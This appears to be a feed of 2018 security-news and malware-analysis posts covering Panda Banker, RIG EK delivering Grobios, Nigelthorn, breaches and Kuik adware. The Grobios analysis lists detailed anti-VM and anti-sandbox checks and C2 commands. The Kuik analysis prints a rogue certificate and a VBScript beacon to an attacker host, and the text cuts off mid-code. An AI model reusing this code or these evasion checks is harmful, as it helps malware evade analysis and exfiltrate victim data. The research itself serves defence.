Panda Banker was first spotted in 2016 by Fox-IT, it borrows code from the Zeus banking Trojan and is sold as a kit on underground forums, In November 2017, threat actors behind the Zeus Panda banking Trojan leveraged black Search Engine Optimization (SEO) to propose malicious links in the search results. Crooks were focused on financial-related keyword queries.

The main feature of the Panda Banker is the stealing of credentials and account numbers, it is able to steal money from victims by implementing “man in the browser” attack.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in the activity associated with the malware in February when the malicious code was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers are able to spy on user interaction at cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverage the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.

Panda-banker-by-industry

In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in 8 industries in North America, most of the targets (78%) are US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financials as well.

Comparison of the two botnet configurations reveals that when Zeus.Panda is targeting Japan, the authors removed the Content Security Policy (CSP) headers: remove_csp  – 1 : The CSP header is a security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks that could execute malicious code from an otherwise trusted site.

This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com, Facebook, Twitter, and a couple of two sites.

The third campaign aimed at financial institutions in Latin America, most of them in Argentina, Columbia, and Ecuador, The same campaign also targeted social media, search, email, entertainment, and tech provider as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.

Pierluigi Paganini

(Security Affairs – Panda Banker, malware)

The post PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media appeared first on Security Affairs.

A Deep Dive Into RIG Exploit Kit Delivering Grobios Trojan

As discussed in previous blogs, exploit kit activity has been on the decline since the latter half of 2016. However, we do still periodically observe significant developments in this space, and we have been observing interesting ongoing activity involving RIG Exploit Kit (EK). Although the volume of its traffic observed in-the-wild has been on the decline, RIG EK remains active, with a wide range of associated crimeware payloads.

In this recent finding, RIG EK was observed delivering a Trojan named Grobios. This blog post will discuss this Trojan in depth with a focus on its evasion and anti-sandbox techniques, but first let’s take a quick look at the attack flow. Figure 1 shows the entire infection chain for the activity we observed.


Figure 1: Infection chain

We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it (Figure 2).


Figure 2: Malicious Iframe injected in latorre[.]com

The iframe loads a malvertisement domain, which communicates over SSL (certificate shown in Figure 3) and leads to the RIG EK landing page that loads the malicious Flash file (Figure 4).


Figure 3: Malicious SSL flow


Figure 4: RIG EK SWF download request

When opened, the Flash file drops the Grobios Trojan. Figure 5 shows the callback traffic from the Grobios Trojan.


Figure 5: Grobios callback

Analysis of the Dropped Malware

Grobios uses various techniques to evade detection and gain persistence on the machine, which makes it hard for it to be uninstalled or to go inactive on the victim machine. It also uses multiple anti-debugging, anti-analysis and anti-VM techniques to hide its behavior. After successful installation on the victim machine, it connects to its command and control (C2) server, which responds with commands.

In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx. The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash. The malware also uses stack strings. Figure 6 shows an example of the malware calling WinApi using the hashes.


Figure 6: An example of calling WinAPI using their hashes.

Loading

The malware sample starts a copy of itself, which further injects its code into svchost.exe or IEXPLORE.EXE depending on the user privilege level. Both parent and child quit after injection is complete. Only svchost.exe/IEXPLORE.EXE keeps running. Figure 7 shows the process tree.


Figure 7: Process tree of the malware

Persistence

The malware has an aggressive approach to persistence. It employs the following techniques:

  • It drops a copy of itself into the %APPDATA% folder, masquerading as a version of legitimate software installed on the victim machine. It creates an Autorun registry key and a shortcut in the Windows Startup folder. During our analysis, it dropped itself to the following path:

%APPDATA%\Google\v2.1.13554\<RandomName>.exe. 

The path can vary depending on the folders the malware finds in %APPDATA%.

  • It drops multiple copies of itself in subfolders of a program at the path %ProgramFiles%/%PROGRAMFILES(X86)%,  again masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
  • It drops a copy itself in the %Temp% folder, and creates a scheduled task to run it.

On an infected system, the malware creates two scheduled tasks, as shown in Figure 8.


Figure 8: Scheduled tasks created by the malware

The malware changes the file Created, Modified, and Accessed times of all of its dropped copies to the Last Modified time of ntdll.dll. To bypass the “File Downloaded from the Internet” warning, the malware removes the :Zone.Identifier flag using DeleteFile API, as shown in Figure 9.


Figure 9: Call to DeleteFileW to remove the :Zone.Identifier Flag from the dropped copy

An interesting behavior of this malware is that it protects its copy in the %TEMP% folder using EFS (Windows Encrypted File System), as seen in Figure 10.


Figure 10: Cipher Command Shows the Malware Copy Protected by EFS

Detecting VM and Malware Analysis Tools

Just before connecting to the C2, the malware does a series of checks to detect the VM and malware analysis environment. It can detect almost all well-known VM software, including Xen, QEMU, VMWare, Virtualbox, Hyper-V, and so on. The following is the list of checks it performs on the victim system:

  • Using the FindWindowEx API, it checks whether any of the analysis tools in Table 1 are running on the system.

Analysis Tools

PacketSniffer

FileMon

WinDbg

Process Explorer

OllyDbg

SmartSniff

cwmonitor

Sniffer

Wireshark

Table 1: Analysis tools detected by malware

  • The malware contains a list of hashes of blacklisted process names. It checks whether the hash of any of running process matches a hash on the blacklist, as shown in Figure 11. 


Figure 11: Check for blacklisted processes

We were able to crack the hashes of the blacklisted processes shown in Table 2.

Hash

Process

283ADE38h

vmware.exe

8A64214Bh

vmount2.exe

13A5F93h

vmusrvc.exe

0F00A9026h

vmsrvc.exe

0C96B0F73h

vboxservice.exe

0A1308D40h

vboxtray.exe

0E7A01D35h

xenservice.exe

205FAB41h

joeboxserver.exe

6F651D58h

joeboxcontrol.exe

8A703DD9h

wireshark.exe

1F758DBh

Sniffhit.exe

0CEF3A27Ch

sysAnalyzer.exe

6FDE1C18h

Filemon.exe

54A04220h

procexp.exe

0A17C90B4h

Procmon.exe

7215026Ah

Regmon.exe

788FCF87h

autoruns.exe

0A2BF507Ch

 

0A9046A7Dh

 

Table 2: Blacklisted processes

  • The malware enumerates registry keys in the following paths to see if they contain the words xen or VBOX:
    • HKLM\HARDWARE\ACPI\DSDT
    • HKLM\HARDWARE\ACPI\FADT
    • HKLM\HARDWARE\ACPI\RSDT
  • It checks whether services installed on the system contain any of the keywords in Table 3:

vmmouse

vmdebug

vmicexchange

vmicshutdown

vmicvss

vmicheartbeat

msvmmouf

VBoxMouse

vpcuhub

vpc-s3

vpcbus

vmx86

vmware

VMMEMCTL

VMTools

XenVMM

xenvdb

xensvc

xennet6

xennet

xenevtchn

VBoxSF

VBoxGuest

   

Table 3: Blacklisted service names

  • It checks whether the username contains any of these words:  MALWARE, VIRUS, SANDBOX, MALTEST
  • It has a list of hashes of blacklisted driver names. It traverses the windows driver directory %WINDIR%\system32\drivers\ using FindFirstFile/FindNextFile APIs to check if the hash of the name of any drivers matches with that of any blacklisted driver's name, as shown in Table 4.

Hash

Driver

0E687412Fh

hgfs.sys

5A6850A1h

vmhgfs.sys

0CA5B452h

prleth.sys

0F9E3EE20h

prlfs.sys

0E79628D7h

prlmouse.sys

68C96B8Ah

prlvideo.sys

0EEA0F1C2h

prl_pv32.sys

443458C9h

vpcs3.sys

2F337B97h

vmsrvc.sys

4D95FD80h

vmx86.sys

0EB7E0625h

vmnet.sys

Table 4: Hashes of blacklisted driver names

  • It calculates the hash of ProductId and matches it with three blacklisted hashes to detect public sandboxes, shown in Table 5.

Hash

Product Id

Sandbox Name

4D8711F4h

76487-337-8429955-22614

Anubis Sanbox

7EBAB69Ch

76487-644-3177037-23510

CWSandbox

D573F44D

55274-640-2673064-23950

Joe Sandbox

Table 5: Blacklisted product IDs

  • The malware calculates the hash of loaded module (DLL) names and compares them with the list of hashes of blacklisted module names shown in Table 6. These are the DLLs commonly loaded into the process being debugged, such as dbhelp.dll and api_log.dll.    

6FEC47C1h

6C8B2973h

0AF6D9F74h

49A4A30h

3FA86C7Dh

Table 6: Blacklisted module names hashes

Figure 12 shows the flow of code that checks for blacklisted module hashes.


Figure 12: Code checks for blacklisted module hashes

  • It checks whether Registry keys present at the path HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum and HKLM\SYSTEM\ControlSet001\Services\Disk\Enum contain any of these words: QEMU, VBOX, VMWARE, VIRTUAL
  • It checks whether registry keys at the path HKLM\SOFTWARE\Microsoft, HKLM\SOFTWARE  contain these words: VirtualMachine, vmware, Hyber-V
  • It checks whether the system bios version present at registry path HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion contains these words: QEMU, BOCHS, VBOX
  • It checks whether the video bios version present at registry path HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion contains  VIRTUALBOX substring.
  • It checks whether the registry key at path HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier contains any of these words: QEMU,vbox, vmware
  • It checks whether the registry key HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions  exists on the system.

Network Communication

The malware contains two hardcoded obfuscated C2s. After de-obfuscating the C2 URLs, it generates a random string of 20 characters, appends it to the end of URL, and sends the request for commands. Before it executes the commands, the malware verifies the identity of the C2. It calculates the hash of 4 bytes of data using the CALG_MD5 algorithm. It then uses the Base64 data from the CERT command as a Public Key in CryptVerifySignature to verify the hash signature (Figure 13). If the signature is verified, the malware executes the commands.


Figure 13: Malware verifies the C2 hash

During our initial analysis, we found that the malware supports the commands shown in Table 7. 

Command

Description

CERT <Base64 data>

Contains the data used to verify the identity of the C2

CONNECT <IP:Port>

Connect to given host for further commands

DISCONNECT

Close all the connections

WAIT <Number of seconds>

Wait for the number of seconds before executing the next commands

REJECT

Kind of NOP. Move on to next command after waiting for 5 second

Table 7: Commands supported by malware

Figure 14 shows commands being issued by the C2 server.


Figure 14: Commands issued by the C2 server

Conclusion

Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye Network Security blocks delivery at the infection point.

Indicators of Compromise (IOCs)

  • 30f03b09d2073e415a843a4a1d8341af
  • 99787d194cbd629d12ef172874e82738
  • 169.239.129[.]17
  • grobiosgueng[.]su

Acknowledgments 

We acknowledge Mariam Muntaha for her contribution to the blog regarding malicious traffic analysis.

Nigelthorn malware infected over 100,000 systems abusing Chrome extensions

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.

A new strain of malware, dubbed Nigelthorn malware because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, most of them in the Philippines, Venezuela, and Ecuador (Over 75%).

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware is spreading through links on Facebook, victims are redirected to a fake YouTube page that asks them to download and install a Chrome extension to play the video. Once the victims accepted the installation, the malicious extension will be added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”

The malware was specifically developed to target both Windows and Linux machines using the Chrome browser.

When a victim clicks on “Add Extension” is redirected to a Bitly URL from which they will be redirected to Facebook in the attempt to provide the credentials for his account.

In order to bypass Google Application validation tools, the threat actors used copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript is executed to start the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware is able to steal Facebook login credentials and Instagram cookies. The malware also redirects users to a Facebook API to generate an access token that is then sent to the Command and Control servers.

The malware propagated by using the stolen credentials, it sends the malicious link to the victim’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses numerous techniques to gain persistence on the infected system, such as closing the extensions tab if the user attempts to access it, or downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

Experts also described a YouTube fraud, the YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.

Pierluigi Paganini

(Security Affairs – Nigelthorn malware, Facebook)

The post Nigelthorn malware infected over 100,000 systems abusing Chrome extensions appeared first on Security Affairs.

Chili’s Restaurants Hit by Payment Card Breach

People who recently paid with their credit or debit card at a Chili’s restaurant may have had their information stolen by cybercriminals, according to Dallas-based Brinker International.

Brinker, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries, issued a notice shortly after the data breach was discovered on May 11.

read more

Security Affairs newsletter Round 162 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      European Central Bank announced a framework for cyber attack simulation on financial firms
·      Google announces the open-source Asylo framework for confidential computing
·      New ZooPark APT targets Android users in Middle East since 2015
·      A new report sheds the lights on state-sponsored Chinese APTs under Winnti umbrella
·      Chrome freezes PC running Windows OS after Windows 10 April update
·      SynAck ransomware Employs Many Novel Techniques to Avoid Detection
·      Experts released an unofficial patch for Zero-Days in Dasan GPON home routers
·      Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
·      Reading the 2017 Internet Crime Complaint Center (IC3) report
·      Secret Conversation – Twitter is testing End-to-End Encryption for direct messages
·      UPDATED – Critical RCE vulnerability found in over a million GPON Home Routers
·      Adobe fixed a Critical Code Execution issue in Flash Player
·      Are you using Python module ‘SSH Decorator? Newer versions include a backdoor
·      baseStriker attack technique allow to bypass Microsoft Office 365 anti-phishing filter
·      May 2018 Android Security Bulletin includes additional Meltdown fix
·      May 2018 Patch Tuesday: Microsoft fixes 2 zero-day flaws reportedly exploited by APT group
·      Signal disappearing messages can be recovered by the macOS client
·      Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
·      Lenovo releases updates to fix Secure Boot flaw in servers and other issues
·      Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
·      The source code of the TreasureHunter PoS Malware leaked online
·      Allanite threat actor focused on critical infrastructure is targeting electric utilities and ICS networks
·      Mining passwords from dozens of public Trello boards
·      Tech giant Telstra warns cloud customers theyre at risk of hack due to a SNAFU
·      Throwhammer, the new Rowhammer attack to remotely hack systems over the LAN
·      Google addresses critical security vulnerabilities in Chrome 66
·      iVideon Russian-based video surveillance solution leaked data, hundreds of thousands of records exposed
·      Wannacry outbreak anniversary: the EternalBlue exploit even more popular now

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 162 – News of the week appeared first on Security Affairs.

7 Chrome Extensions Spreading Through Facebook Caught Stealing Passwords

Luring users on social media to visit lookalike version of popular websites that pop-up a legitimate-looking Chrome extension installation window is one of the most common modus operandi of cybercriminals to spread malware. Security researchers are again warning users of a new malware campaign that has been active since at least March this year and has already infected more than 100,000 users

Keep Your Mum Safe This Mother’s Day!

On my first Mother’s Day 21 years ago, I received a pair of gorgeous fluffy pink slippers. Last year – it was a sleek shiny green Fitbit! Technology has absolutely transformed our gift giving and Mother’s Day is no exception.

The rising popularity of internet connected gifts means many lucky mums will receive a glossy new device on Mother’s Day. It may be a digital home assistant, a fitness tracker or even a big new Smart TV. Whatever it is, we must understand the potential risks involved when giving or receiving an internet enabled device. Because we don’t want to put our mums (or our families) at risk.

But don’t let this change your shopping plans! Like anything in life, if you’re prepared you can minimise the risks and avoid getting caught out by cyber threats. So, here is the low-down on threats posed by some of the more popular gifts this Mother’s Day and tips on how to protect against them.

Digital Home Assistants

Regardless of which brand you might choose, a digital assistant can be a massive help for any busy mum.  Whether it reading the kids a bedtime story or a recipe while you cook, or setting timers – it’s the closest thing many mums can get to another set of hands!

However, there are risks associated with these mother’s helpers. If your home assistant is hacked, your personal information could be at risk. Which means your  bank accounts details or your identity could be put at risk. And as the device is ‘always on’, your personal assistant can listen to and record what is being said around your house – a definite privacy issue.

What to Do to Stay Safe

  • Protecting your Home Wi-Fi is an essential step to ensuring your home assistant is secure. Solutions such as McAfee’s Secure Home Platform, available soon on D-Link routers, will secure all your devices that connect to your Home Wi-Fi, including your home assistant. So, you have protection and peace of mind.
  • Always change the manufacturer’s default password when setting up the Wi-Fi and ensure you create a complex, unique one instead. A combination of lower and upper-case letters, numbers and special characters is ideal.
  • Don’t allow your home assistant to store your private information. I also advise against allowing your home assistant to store passwords, credit card data, or any of your contact information.

Fitness Trackers

A wearable fitness tracker might be at the top of your mum’s wish list this Mother’s Day. But there are some surprisingly worrying security risks surrounding the popular gift that she should be aware of.

Researchers have found it is possible to crack PINs and passwords by hacking into the motion sensors to track hand movements. Additional research shows that the encryption offered by wearable fitness tracker manufacturers is quite easily intercepted. This means all your personal data stored on the device can easily be hacked. And while info like your calorie intake and step count many not seem valuable to a hacker, information like where you worked out and how long you were away from home can paint a very valuable picture of who you are!

What to Do to Stay Safe

  • Keep your fitness tracker up-to-date. Just like with any connected device, as soon as software updates become available, download them immediately to prevent cyber criminals from hacking your device.
  • Set up your fitness tracker and any associated online accounts with an obscure user name and unique passwords, that are completely unrelated to any of your other accounts.
  • Read the Privacy Policy of the device or app you are considering buying. Make sure you are comfortable with the company’s commitment to protecting your data.
  • Consider disabling certain features of the fitness tracker if you feel that your privacy many be jeopardised.

Smart TVs

Whilst buying mum a smart TV would certainly make her feel spoilt this Mother’s Day, they can come with a more sinister side. In March 2017, news emerged that it may be possible to hack into smart TVs to spy on users. Since then, several critical vulnerabilities have been found in Vestel firmware, which is used in more than 30 popular TV brands. These vulnerabilities could be easily leveraged to spy on smart TV users through the microphones and cameras.

What to Do to Stay Safe

  • Buy smart TVs with security in mind. When purchasing a smart TV, it’s always important to do your homework and read up on any current vulnerabilities.
  • Secure your home’s internet at the source. Smart TVs, like all connected devices, must connect to a home Wi-Fi network to run. If they’re vulnerable, they could expose your network as a whole. Since it can be challenging to lock down all the IoT devices in a home, again a solution like McAfee Secure Home Platform can provide protection at the router-level.

If you are shopping online for mum, please remember to keep your guard up. Only shop from secure websites where the URL begins with ‘https://’ and a lock icon appears in the address bar. NEVER, EVER shop using unsecured Wi-Fi. It can leave you vulnerable to all sorts of nasty attacks and your private information may be hacked by a third party.

Finally, and most importantly, don’t forget to thank your wonderful mum for everything she has done for you. A handwritten card with a few lines of thanks is extremely powerful!!

Happy Mother’s Day!!

Alex xx

 

The post Keep Your Mum Safe This Mother’s Day! appeared first on McAfee Blogs.

Data Breach Statistics Q1 2018: Disclosure Times Remain High as Total Numbers Fall

Data breaches are down year-over-year. As noted by Infosecurity Magazine, almost 1.4 billion records were exposed in 686 breaches reported between Jan. 1 and March 31 this year.

As eye-popping as those numbers are, they represent a big improvement from 2017, when 1,442 incidents exposed a total of 3.4 billion records. In addition, tax phishing attempts for W-2 data fell from 214 attacks last year to just 31 in 2018.

Despite the downward trends in data breach statistics, however, new research revealed that disclosure remains a trouble spot for organizations, especially in light of upcoming regulations. Despite year-to-year improvement, according to Computer Weekly, the average time between incident and disclosure is still more than five weeks.

Digging Into Data Breach Statistics

As Help Net Security reported, 2018 is off to a relatively secure start, at least in terms of data breach statistics. The recent spike in cryptocurrency value may provide an explanation: Crypto-mining malware, which leverages unused central processing unit (CPU) cycles to dig for digital currency, saw a significant boost at the beginning of this year, which could account for the shift away from traditional breach methods that may attract more attention from IT security professionals.

In general, however, the nature of data breaches has not changed significantly over the past 12 months. According to Risk Based Security’s “Q1 2018 Data Breach QuickView Report,” fraud remains the top breach type compromising the most records (1.27 billion) while unauthorized access held its spot as the most common breach cause. Skimming, inadvertent disclosure, phishing and malware rounded out the top five, just as they did in 2017.

Data Breach Disclosure Times Remain High

According to the Risk Based Security report, the average time between data breach detection and disclosure is decreasing. In 2015, it took companies 82.6 days on average to disclose a breach. By 2017, this figure was cut nearly in half to 42.7 days, and it dropped even further to 37.9 days in the first quarter of 2018, showing a trend of continuous improvement over the last four years.

The challenge is that, as noted by the Computer Weekly piece, upcoming data privacy regulations include disclosure timelines. The General Data Protection Regulation (GDPR), for example, imposes a 72-hour notification rule for data breaches. Despite the encouraging year-to-year progress in the effort to reduce breach disclosure times, organizations still have a long way to go to meet this requirement.

The Risk Based Security report noted that Q1 2018 has been “the quietest first quarter for breach activity since 2012.” While some trends, such as the move to crypto-mining malware and away from W-2 phishing, help account for these numbers, the researchers identified no underlying pattern, suggesting that these data breach statistics are likely to evolve throughout the rest of the year.

The post Data Breach Statistics Q1 2018: Disclosure Times Remain High as Total Numbers Fall appeared first on Security Intelligence.

Malware spam: "New documents available for download" / service@barclaysdownloads.co.uk / barclaysdownloads.com

This fake Barclays spam seems to lead to the Trickbot banking trojan. From:    Barclays [service@barclaysdownloads.co.uk]Date:    10 May 2018, 13:16Subject:    New documents available for downloadSigned by:    barclaysdownloads.co.ukSecurity:    Standard encryption (TLS) Learn moreBarclays Bank PLC Has Sent You Important Account Documents to SignYou can view the document in your Barclays

Devs Find Fake Version of Bitcoin Wallet Stealing Users’ Seeds

Developers have found that a fake version of a popular Bitcoin Wallet comes equipped with the ability to steal users’ seeds. On 9 May, the Electrum team published a document on GitHub calling out “Electrum Pro” as “stealware” and “bitcoin-stealing malware.” According to the developers, the individuals behind Electrum Pro took control of “electrum dot […]… Read More

The post Devs Find Fake Version of Bitcoin Wallet Stealing Users’ Seeds appeared first on The State of Security.

Wipers – Destruction as a means to an end

This whitepaper post is authored by Vitor Ventura and with contributions from Martin Lee

In a digital era when everything and everyone is connected, malicious actors have the perfect space to perform their activities. During the past few years, organizations have suffered several kinds of attacks that arrived in many shapes and forms. But none have been more impactful than wiper attacks. Attackers who deploy wiper malware have a singular purpose of destroying or disrupting systems and/or data.
Unlike malware that holds data for ransom (ransomware), when a malicious actor decides to use a wiper in their activities, there is no direct financial motivation. For businesses, this often is the worst kind of attack, since there is no expectation of data recovery.
Another crucial aspect of a wiper attack is the fear, uncertainty and doubt that it generates. In the past, wiper attacks have been used by malicious actors with a dual purpose: Generate social destabilization while sending a public message, while also destroying all traces of their activities.
A wiper's destructive capability can vary, ranging from the overwriting of specific files, to the destruction of the entire filesystem. The amount of data impacted will be a direct consequence of the technique used. Which, of course, will have direct impact on the business — the harder the data/system recovery process becomes, the bigger the business impact.
The defense against these attacks often falls back to the basics. By having certain protections in place — a tested cyber security incident response plan, a risk-based patch management program, a tested and cyber security-aware business continuity plan, and network and user segmentation on top of the regular software security stack — an organization dramatically increases its resilience against these kind of attacks.

Download the full whitepaper here.

Kuik: a simple yet annoying piece of adware

Some pieces of malware can be so simple—and yet such a pain to get rid of—especially when they start interfering with your system’s configuration. This much is true for the Kuik adware program, which surprised us all by forcing affected machines to join a domain controller.

The perpetrators are using this unusual technique to push Google Chrome extensions and coin miner applications to their victims. In this blog, we’ll provide technical analysis of this adware and custom removal instructions.

Technical description

Stage 1 – .NET installer

0ba20fee958b88c48f3371ec8d8a8e5d

The first stage is written in .NET with an icon imitating the Adobe Flash Player. This is typical of bundlers that promise to update software components but also add their own code to the original installer.

After opening with a dotNet decompiler (i.e. dnSpy), we found that the project’s original name was WWVaper.

It has three resources inside:

  • a certificate (svr.crt)
  • a legitimate Flash (decoy)
  • a next stage component (upp.exe)

The certificate:

-----BEGIN CERTIFICATE-----
MIIEZjCCA06gAwIBAgIJAPywkVD7m/9XMA0GCSqGSIb3DQEBCwUAMHMxCzAJBgNV
BAYTAlVTMQswCQYDVQQIDAJOWTERMA8GA1UEBwwITmV3IFlvcmsxFTATBgNVBAoM
DEV4YW1wbGUsIExMQzEMMAoGA1UEAwwDYWxsMR8wHQYJKoZIhvcNAQkBFhB0ZXN0
QGV4YW1wbGUuY29tMB4XDTE4MDIxNjIyMjA0M1oXDTE5MDIxNjIyMjA0M1owczEL
MAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMREwDwYDVQQHDAhOZXcgWW9yazEVMBMG
A1UECgwMRXhhbXBsZSwgTExDMQwwCgYDVQQDDANhbGwxHzAdBgkqhkiG9w0BCQEW
EHRlc3RAZXhhbXBsZS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDMohZZUrsJOqXS1/eTpGGOMDxEE+YmRLmSU5h/K4tmnkr7Tv9cukICp/Xxnrci
5ONLdqgQFH1xLxLa6Xo+2X075NS0VjfMPx9WvYPSZ/T7uQQhb8Mc+ojjNoHK0JbD
oPjiuiGTLllq1AQ34kvQa6k8E7GPjSdrQnPF55+aWAdPSIDcdqxMt1uFOcF0DY4y
vHNpFw1xsjpYuvw1/MvwITr3A+PdKN9TIMzDgbXTZEtc7rWDah4HtIYSJZ2xwIcH
qp6xU9FypSV6JnbITlv4gZkUuI2HeiNpSGGd55KOtk5pDhuGeNfLGor6eWcSG6eX
N6erGBkM7VTfJ5yM9Pxfcu+hAgMBAAGjgfwwgfkwHQYDVR0OBBYEFCZDbmCp6xnU
3F/U3InMEiuduPEMMB8GA1UdIwQYMBaAFCZDbmCp6xnU3F/U3InMEiuduPEMMAkG
A1UdEwQCMAAwCwYDVR0PBAQDAgWgMHEGA1UdEQRqMGiCCXlhaG9vLmNvbYINd3d3
LnlhaG9vLmNvbYIKZ29vZ2xlLmNvbYIOd3d3Lmdvb2dsZS5jb22CCWdvb2dsZS5t
ZYINd3d3Lmdvb2dsZS5tZYIIYmluZy5jb22CDHd3dy5iaW5nLmNvbTAsBglghkgB
hvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwDQYJKoZIhvcN
AQELBQADggEBAMQm1OHLdcYvQK6aMPgYdOozkDT20DuJ6NZD1Frljjex7NzB7nVm
AC+3h1huSyqxYGbJQ8J3wLOYRZH+N5GOZUvjwrU+NY5KurWbMj6USMfsWfnnSXQi
0ADyjYZqtPMmIaIK86yPx4t+3mA8VX5nDRurjKoprTKwaQpxKksZ0kkpitN1epZX
2g1YJAnjnq/9Ilt3MOCEpoCnUz5E+bgQO9AS9ZQqNryuGFfzjgXxLbYBbyDVknZ0
2zz4Zzkm2QBCIGi5jigz7VmwmcpIhJPH9QKlCw5Dx+F3mepR01UMaiwEBDGIeSWX
+joBVMKdqhFu9zChlN0dW0hbViIm+gDYsCQ=
-----END CERTIFICATE-----

Details of the certificate:

The certificate points to a DNS name of yahoo.com. However, the certification path is invalid:

The .NET installer is responsible for installing the malicious certificate and other components. First, it enumerates the network interfaces and adds collected IPs to the list:

Then, it adds a new IP as a DNS (18.219.162.248) to the collected interfaces. It also installs its own certificate (svr.crt):

Stage 2 – upp.exe

This application is an installer bundle that is not obfuscated. Inside, we found a cabinet file:

It contains other modules to be dropped:

The application “install.exe” is deployed with the “setup.bat” as a parameter.

Stage 3 – unpacked components from the cabinet

The application install.exe is basic. Its only role is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component named SqadU9FBEV.bat:

It delays execution by pinging 127.0.0.1. Then, it runs the second encoded script, giving it a campaign ID as a parameter:

The next element deployed is an encoded VBS script:

After decoding it (with this decoder), we saw this script in clear: NYkjVVXepl.vbs. We also saw that it fingerprints the system and beacons to a server:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") 
for each System in SystemSet 
  winVer = System.Caption 
next
Function trackEvent(eventName, extraData)
  Set tracking = CreateObject("MSXML2.XMLHTTP")
  tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
  tracking.send
  err.clear
End Function

The interesting fragment is about adding the infected computer to a domain:

SET objNetwork = CREATEOBJECT("WScript.Network")
strComputer = objNetwork.ComputerName
SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
